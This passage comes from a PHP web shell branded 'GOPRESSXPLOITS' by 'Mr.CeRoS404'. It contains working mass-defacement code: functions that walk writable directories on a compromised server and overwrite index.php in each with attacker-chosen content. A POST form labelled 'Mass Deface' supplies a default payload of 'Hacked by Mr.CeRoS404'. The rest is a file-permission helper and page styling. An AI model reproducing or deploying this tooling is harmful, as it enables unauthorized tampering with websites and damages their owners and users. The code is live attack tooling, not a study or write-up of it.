1305. if(is_dir($dirc)) {
1306.  
1307. if(is_writable($dirc)) {
1308.  
1309. echo "[<font color=lime>DONE</font>] $lokasi<br>";
1310.  
1311. file_put_contents($lokasi, $isi_script);
1312.  
1313. $idx = sabun_massal($dirc,$namafile,$isi_script);
1314.  
1315. }
1316.  
1317. }
1318.  
1319. }
1320.  
1321. }
1322.  
1323. }
1324.  
1325. }
1326.  
1327. function sabun_biasa($path,$namafile,$isi_script) {
1328.  
1329. if(is_writable($path)) {
1330.  
1331. $dira = scandir($path);
1332.  
1333. foreach($dira as $dirb) {
1334.  
1335. $dirc = "$path/$dirb";
1336.  
1337. $lokasi = $dirc.'/'.$namafile;
1338.  
1339. if($dirb === '.') {
1340.  
1341. file_put_contents($lokasi, $isi_script);
1342.  
1343. } elseif($dirb === '..') {
1344.  
1345. file_put_contents($lokasi, $isi_script);
1346.  
1347. } else {
1348.  
1349. if(is_dir($dirc)) {
1350.  
1351. if(is_writable($dirc)) {
1352.  
1353. echo "http://$dirb/$namafile<br>";
1354.  
1355. file_put_contents($lokasi, $isi_script);
1356.  
1357. }
1358.  
1359. }
1360.  
1361. }
1362.  
1363. }
1364.  
1365. }
1366.  
1367. }
1368.  
1369. if($_POST['start']) {
1370.  
1371. if($_POST['tipe_sabun'] == 'mahal') {
1372.  
1373. echo "<div style='margin: 5px auto; padding: 5px'>";
1374.  
1375. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1376.  
1377. echo "</div>";
1378.  
1379. } elseif($_POST['tipe_sabun'] == 'murah') {
1380.  
1381. echo "<div style='margin: 5px auto; padding: 5px'>";
1382.  
1383. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1384.  
1385. echo "</div>";
1386.  
1387. }
1388.  
1389. }else {
1390.  
1391. echo "<center>";
1392.  
1393. echo "<form method='post'>
1394.  
1395. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1396.  
1397. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
1398.  
1399. <font style='text-decoration: underline;'>Folder:</font><br>
1400.  
1401. <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
1402.  
1403. <font style='text-decoration: underline;'>Filename:</font><br>
1404.  
1405. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
1406.  
1407. <font style='text-decoration: underline;'>Index File:</font><br>
1408.  
1409. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Mr.CeRoS404</textarea><br>
1410.  
1411. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1412.  
1413. </form></center>";
1414.  
1415. }
1416.  
1417. }
1418.  
1419. echo '</table>';
1420.  
1421. echo'</div>';
1422.  
1423. }
1424.  
1425. echo '<br /><font color="#00FFFF">GOPRESSXPLOITS<font color="#E0FFFF"></font><a href="" target="_blank"> r3c0ded bY <font color="#8A2BE2">Mr.CeRoS404 </a> <a href="" target="_blank"><font color="#FF69B4"></a></font>
1426.  
1427. </BODY>
1428.  
1429. </HTML>';
1430.  
1431. function perms($file){
1432.  
1433. $perms = fileperms($file);
1434.  
1435. if (($perms & 0xC000) == 0xC000) {
1436.  
1437. // Socket
1438.  
1439. $info = 's';
1440.  
1441. } elseif (($perms & 0xA000) == 0xA000) {
1442.  
1443. // Symbolic Link
1444.  
1445. $info = 'l';
1446.  
1447. } elseif (($perms & 0x8000) == 0x8000) {
1448.  
1449. // Regular
1450.  
1451. $info = '-';
1452.  
1453. } elseif (($perms & 0x6000) == 0x6000) {
1454.  
1455. // Block special
1456.  
1457. $info = 'b';
1458.  
1459. } elseif (($perms & 0x4000) == 0x4000) {
1460.  
1461. // Directory
1462.  
1463. $info = 'd';
1464.  
1465. } elseif (($perms & 0x2000) == 0x2000) {
1466.  
1467. // Character special
1468.  
1469. $info = 'c';
1470.  
1471. } elseif (($perms & 0x1000) == 0x1000) {
1472.  
1473. // FIFO pipe
1474.  
1475. $info = 'p';
1476.  
1477. } else {
1478.  
1479. // Unknown
1480.  
1481. $info = 'u';
1482.  
1483. }
1484.  
1485. // Owner
1486.  
1487. $info .= (($perms & 0x0100) ? 'r' : '-');
1488.  
1489. $info .= (($perms & 0x0080) ? 'w' : '-');
1490.  
1491. $info .= (($perms & 0x0040) ?
1492.  
1493. (($perms & 0x0800) ? 's' : 'x' ) :
1494.  
1495. (($perms & 0x0800) ? 'S' : '-'));
1496.  
1497. // Group
1498.  
1499. $info .= (($perms & 0x0020) ? 'r' : '-');
1500.  
1501. $info .= (($perms & 0x0010) ? 'w' : '-');
1502.  
1503. $info .= (($perms & 0x0008) ?
1504.  
1505. (($perms & 0x0400) ? 's' : 'x' ) :
1506.  
1507. (($perms & 0x0400) ? 'S' : '-'));
1508.  
1509. // World
1510.  
1511. $info .= (($perms & 0x0004) ? 'r' : '-');
1512.  
1513. $info .= (($perms & 0x0002) ? 'w' : '-');
1514.  
1515. $info .= (($perms & 0x0001) ?
1516.  
1517. (($perms & 0x0200) ? 't' : 'x' ) :
1518.  
1519. (($perms & 0x0200) ? 'T' : '-'));
1520.  
1521. return $info;
1522.  
1523. }
1524.  
1525. ?>
1526.  
1527.  
1528.  
1529. <!-- --------Cursor--------- -->
1530.  
1531. <style type='text/css'>body, a, a:link{cursor:url(http://4.bp.blogspot.com/-hAF7tPUnmEE/TwGR3lRH0EI/AAAAAAAAAs8/6pki22hc3NE/s1600/ass.png), default;} a:hover {cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),wait;}</style>
1532.  
1533.  
1534.  
1535.  
1536.  
1537.  
1538.  <body background="https://cn.pling.com/img//hive/content-pre1/85401-1.png">